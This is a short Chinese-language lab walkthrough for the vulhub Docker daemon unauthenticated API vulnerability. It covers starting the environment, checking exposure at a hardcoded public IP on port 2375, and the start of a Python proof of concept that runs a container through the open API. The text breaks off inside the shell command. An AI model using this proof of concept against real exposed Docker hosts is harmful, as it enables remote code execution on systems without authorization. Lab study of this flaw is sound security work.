1.进入 vulhub 的 docker daemon api 未授权访问漏洞 路径
cd /usr/local/tools/vulhub/docker/unauthorized-rce
2.编译并启动环境
docker-compose up -d
3.查看环境运行状态
docker ps | grep rce
漏洞检测
访问 http://139.196.87.102:2375/version
,若能访问并如下图所示,证明存在未授权访问漏洞。
漏洞利用
POC
import docker
client = docker.DockerClient(base_url=‘http://139.196.87.102:2375/’)
data = client.containers.run(‘alpine:latest’, r’‘‘sh -c “echo